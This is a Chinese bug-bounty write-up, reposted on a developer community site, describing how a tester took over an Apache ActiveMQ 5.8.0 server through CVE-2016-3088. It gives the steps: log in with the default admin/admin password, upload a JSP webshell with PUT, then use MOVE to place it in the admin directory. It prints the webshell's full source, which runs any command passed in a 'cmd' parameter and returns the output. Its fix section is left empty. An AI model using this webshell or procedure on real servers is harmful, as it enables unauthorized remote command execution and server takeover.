首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

摸金ActiveMQ服务漏洞

漏洞:CVE-2016-3088,漏洞赏金1000RMB

漏洞摘要

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。

漏洞介绍

该SRC平台使用了Apache ActiveMQ服务器,并且对外开放了8161端口。然后开发者又使用了默认密码,ActiveMQ 中的 FileServer 服务允许用户通过 PUT 方法上传文件到指定目录,但发现PUT上传上去的jsp马执行不成功,于是使用MOVE方式上传,才导致了服务器被提权成功。

漏洞利用

弹出一个登录窗口,然后输入默认密码,admin/admin,就成功登录。

显示版本为5.8.0,是存在CVE-2016-3088漏洞的,于是获取物理路径:

再PUT一个Jsp的Webshell到fileserver目录(发现不成功)

jsp马为:

out.print("Hello");

String strcmd = request.getParameter("cmd");

String line =null;

Process p=Runtime.getRuntime().exec(strcmd);

InputStream is = p.getInputStream();

BufferedReader br = new BufferedReader(new InputStreamReader(is));

while((line =br.readLine())!=null){

out.print(line+"

");

}

于是使用MOVE方式将webshell移入到admin/目录中

最后再成功执行webshell权限

漏洞修复

分享SRC摸金漏洞实战之路,多多关注

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180114G0A3KH00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券